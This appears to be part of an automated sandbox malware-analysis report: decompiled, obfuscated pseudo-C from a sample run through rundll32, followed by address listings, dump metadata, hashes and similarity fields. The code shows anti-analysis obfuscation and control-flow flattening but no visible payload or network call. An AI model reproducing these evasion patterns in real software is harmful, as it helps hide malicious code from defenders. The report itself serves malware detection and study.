				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E00388519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E00388519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E003816AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E0038D25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E00382007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E00388F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E003742C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E00377FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E0037DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E00377FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}









































































                                                                                                                                                            0x0037d6e2
                                                                                                                                                            0x0037d6eb
                                                                                                                                                            0x0037d6f2
                                                                                                                                                            0x0037d6f9
                                                                                                                                                            0x0037d700
                                                                                                                                                            0x0037d707
                                                                                                                                                            0x0037d709
                                                                                                                                                            0x0037d70e
                                                                                                                                                            0x0037d719
                                                                                                                                                            0x0037d71c
                                                                                                                                                            0x0037d729
                                                                                                                                                            0x0037d734
                                                                                                                                                            0x0037d736
                                                                                                                                                            0x0037d73e
                                                                                                                                                            0x0037d740
                                                                                                                                                            0x0037d748
                                                                                                                                                            0x0037d74d
                                                                                                                                                            0x0037d755
                                                                                                                                                            0x0037d75d
                                                                                                                                                            0x0037d76b
                                                                                                                                                            0x0037d770
                                                                                                                                                            0x0037d776
                                                                                                                                                            0x0037d77e
                                                                                                                                                            0x0037d786
                                                                                                                                                            0x0037d78e
                                                                                                                                                            0x0037d796
                                                                                                                                                            0x0037d79b
                                                                                                                                                            0x0037d7a0
                                                                                                                                                            0x0037d7a8
                                                                                                                                                            0x0037d7b0
                                                                                                                                                            0x0037d7bb
                                                                                                                                                            0x0037d7c6
                                                                                                                                                            0x0037d7d1
                                                                                                                                                            0x0037d7e3
                                                                                                                                                            0x0037d7e8
                                                                                                                                                            0x0037d7f1
                                                                                                                                                            0x0037d7fc
                                                                                                                                                            0x0037d809
                                                                                                                                                            0x0037d80a
                                                                                                                                                            0x0037d814
                                                                                                                                                            0x0037d81d
                                                                                                                                                            0x0037d821
                                                                                                                                                            0x0037d829
                                                                                                                                                            0x0037d831
                                                                                                                                                            0x0037d836
                                                                                                                                                            0x0037d83e
                                                                                                                                                            0x0037d846
                                                                                                                                                            0x0037d851
                                                                                                                                                            0x0037d859
                                                                                                                                                            0x0037d864
                                                                                                                                                            0x0037d86c
                                                                                                                                                            0x0037d874
                                                                                                                                                            0x0037d879
                                                                                                                                                            0x0037d881
                                                                                                                                                            0x0037d889
                                                                                                                                                            0x0037d891
                                                                                                                                                            0x0037d899
                                                                                                                                                            0x0037d8a1
                                                                                                                                                            0x0037d8a9
                                                                                                                                                            0x0037d8b1
                                                                                                                                                            0x0037d8b9
                                                                                                                                                            0x0037d8c1
                                                                                                                                                            0x0037d8cb
                                                                                                                                                            0x0037d8d9
                                                                                                                                                            0x0037d8de
                                                                                                                                                            0x0037d8e7
                                                                                                                                                            0x0037d8f2
                                                                                                                                                            0x0037d8fa
                                                                                                                                                            0x0037d902
                                                                                                                                                            0x0037d907
                                                                                                                                                            0x0037d90c
                                                                                                                                                            0x0037d914
                                                                                                                                                            0x0037d91c
                                                                                                                                                            0x0037d921
                                                                                                                                                            0x0037d926
                                                                                                                                                            0x0037d92e
                                                                                                                                                            0x0037d936
                                                                                                                                                            0x0037d93e
                                                                                                                                                            0x0037d946
                                                                                                                                                            0x0037d952
                                                                                                                                                            0x0037d957
                                                                                                                                                            0x0037d95d
                                                                                                                                                            0x0037d965
                                                                                                                                                            0x0037d970
                                                                                                                                                            0x0037d978
                                                                                                                                                            0x0037d983
                                                                                                                                                            0x0037d98e
                                                                                                                                                            0x0037d999
                                                                                                                                                            0x0037d9a4
                                                                                                                                                            0x0037d9b6
                                                                                                                                                            0x0037d9bb
                                                                                                                                                            0x0037d9c4
                                                                                                                                                            0x0037d9cf
                                                                                                                                                            0x0037d9da
                                                                                                                                                            0x0037d9e5
                                                                                                                                                            0x0037d9f0
                                                                                                                                                            0x0037d9f8
                                                                                                                                                            0x0037da00
                                                                                                                                                            0x0037da08
                                                                                                                                                            0x0037da1a
                                                                                                                                                            0x0037da1f
                                                                                                                                                            0x0037da28
                                                                                                                                                            0x0037da33
                                                                                                                                                            0x0037da3b
                                                                                                                                                            0x0037da43
                                                                                                                                                            0x0037da4b
                                                                                                                                                            0x0037da53
                                                                                                                                                            0x0037da5b
                                                                                                                                                            0x0037da60
                                                                                                                                                            0x0037da68
                                                                                                                                                            0x0037da73
                                                                                                                                                            0x0037da7b
                                                                                                                                                            0x0037da86
                                                                                                                                                            0x0037da93
                                                                                                                                                            0x0037da94
                                                                                                                                                            0x0037da9e
                                                                                                                                                            0x0037daa2
                                                                                                                                                            0x0037daaa
                                                                                                                                                            0x0037dab5
                                                                                                                                                            0x0037dabd
                                                                                                                                                            0x0037dac8
                                                                                                                                                            0x0037dad0
                                                                                                                                                            0x0037dada
                                                                                                                                                            0x0037dadf
                                                                                                                                                            0x0037dae7
                                                                                                                                                            0x0037daef
                                                                                                                                                            0x0037db03
                                                                                                                                                            0x0037db08
                                                                                                                                                            0x0037db0f
                                                                                                                                                            0x0037db16
                                                                                                                                                            0x0037db21
                                                                                                                                                            0x0037db2c
                                                                                                                                                            0x0037db34
                                                                                                                                                            0x0037db3f
                                                                                                                                                            0x0037db47
                                                                                                                                                            0x0037db52
                                                                                                                                                            0x0037db57
                                                                                                                                                            0x0037db5b
                                                                                                                                                            0x0037db63
                                                                                                                                                            0x0037db6b
                                                                                                                                                            0x0037db76
                                                                                                                                                            0x0037db81
                                                                                                                                                            0x0037db8c
                                                                                                                                                            0x0037db97
                                                                                                                                                            0x0037db9f
                                                                                                                                                            0x0037dbaa
                                                                                                                                                            0x0037dbb2
                                                                                                                                                            0x0037dbb7
                                                                                                                                                            0x0037dbbc
                                                                                                                                                            0x0037dbc4
                                                                                                                                                            0x0037dbcc
                                                                                                                                                            0x0037dbd4
                                                                                                                                                            0x0037dbdc
                                                                                                                                                            0x0037dbe4
                                                                                                                                                            0x0037dbec
                                                                                                                                                            0x0037dbf4
                                                                                                                                                            0x0037dbf9
                                                                                                                                                            0x0037dbfe
                                                                                                                                                            0x0037dc02
                                                                                                                                                            0x0037dc0a
                                                                                                                                                            0x0037dc12
                                                                                                                                                            0x0037dc1a
                                                                                                                                                            0x0037dc22
                                                                                                                                                            0x0037dc2a
                                                                                                                                                            0x0037dc32
                                                                                                                                                            0x0037dc3a
                                                                                                                                                            0x0037dc42
                                                                                                                                                            0x0037dc4a
                                                                                                                                                            0x0037dc52
                                                                                                                                                            0x0037dc5a
                                                                                                                                                            0x0037dc65
                                                                                                                                                            0x0037dc70
                                                                                                                                                            0x0037dc7b
                                                                                                                                                            0x0037dc89
                                                                                                                                                            0x0037dc91
                                                                                                                                                            0x0037dc95
                                                                                                                                                            0x0037dc9a
                                                                                                                                                            0x0037dca2
                                                                                                                                                            0x0037dca2
                                                                                                                                                            0x0037dca2
                                                                                                                                                            0x0037dca6
                                                                                                                                                            0x0037dca6
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcb6
                                                                                                                                                            0x0037dcb6
                                                                                                                                                            0x0037de66
                                                                                                                                                            0x0037de6c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcbc
                                                                                                                                                            0x0037dcc2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df63
                                                                                                                                                            0x0037dcce
                                                                                                                                                            0x0037de01
                                                                                                                                                            0x0037de05
                                                                                                                                                            0x0037de0a
                                                                                                                                                            0x0037de0f
                                                                                                                                                            0x0037de52
                                                                                                                                                            0x0037de52
                                                                                                                                                            0x0037de57
                                                                                                                                                            0x0037de57
                                                                                                                                                            0x0037de11
                                                                                                                                                            0x0037de1f
                                                                                                                                                            0x0037de27
                                                                                                                                                            0x0037de39
                                                                                                                                                            0x0037de3d
                                                                                                                                                            0x0037de41
                                                                                                                                                            0x0037de41
                                                                                                                                                            0x0037de44
                                                                                                                                                            0x0037de48
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcd4
                                                                                                                                                            0x0037dcd6
                                                                                                                                                            0x0037dd6a
                                                                                                                                                            0x0037dd91
                                                                                                                                                            0x0037dd9b
                                                                                                                                                            0x0037dda0
                                                                                                                                                            0x0037df40
                                                                                                                                                            0x0037df40
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcd8
                                                                                                                                                            0x0037dcde
                                                                                                                                                            0x0037dd31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dce0
                                                                                                                                                            0x0037dce6
                                                                                                                                                            0x0037df45
                                                                                                                                                            0x0037df4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df4d
                                                                                                                                                            0x0037dcec
                                                                                                                                                            0x0037dd14
                                                                                                                                                            0x0037dd16
                                                                                                                                                            0x0037dd1b
                                                                                                                                                            0x0037dd24
                                                                                                                                                            0x0037dd29
                                                                                                                                                            0x0037dca6
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dcb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcb0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dce6
                                                                                                                                                            0x0037dcde
                                                                                                                                                            0x0037dcd6
                                                                                                                                                            0x0037dcce
                                                                                                                                                            0x0037df6e
                                                                                                                                                            0x0037df6e
                                                                                                                                                            0x0037de73
                                                                                                                                                            0x0037de79
                                                                                                                                                            0x0037df22
                                                                                                                                                            0x0037df23
                                                                                                                                                            0x0037df24
                                                                                                                                                            0x0037df29
                                                                                                                                                            0x0037df2f
                                                                                                                                                            0x0037df3b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df31
                                                                                                                                                            0x0037df31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037df31
                                                                                                                                                            0x0037de7f
                                                                                                                                                            0x0037de85
                                                                                                                                                            0x0037def6
                                                                                                                                                            0x0037defb
                                                                                                                                                            0x0037df03
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de87
                                                                                                                                                            0x0037de87
                                                                                                                                                            0x0037de8e
                                                                                                                                                            0x0037dee9
                                                                                                                                                            0x0037deee
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de90
                                                                                                                                                            0x0037de96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de9c
                                                                                                                                                            0x0037deb3
                                                                                                                                                            0x0037deb4
                                                                                                                                                            0x0037deb5
                                                                                                                                                            0x0037deba
                                                                                                                                                            0x0037dec0
                                                                                                                                                            0x0037dec6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037dec6
                                                                                                                                                            0x0037dec0
                                                                                                                                                            0x0037de96
                                                                                                                                                            0x0037de8e
                                                                                                                                                            0x0037de85
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037de79
                                                                                                                                                            0x0037dcaa
                                                                                                                                                            0x0037dca6

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                                                            • API String ID: 0-652707834
                                                                                                                                                            • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                                            • Instruction ID: 9426e84c3b9472dc103f886e47143d94ec0d4336c1f25eb6a9f8599f28594d6b
                                                                                                                                                            • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                                            • Instruction Fuzzy Hash: 5712307250C3809FD379DF25C88AA9BBBE2BBC4344F10891DE5D98A260D7B58949CF53
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003781B7 Relevance: 9.1, Strings: 7, Instructions: 349COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E003781B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
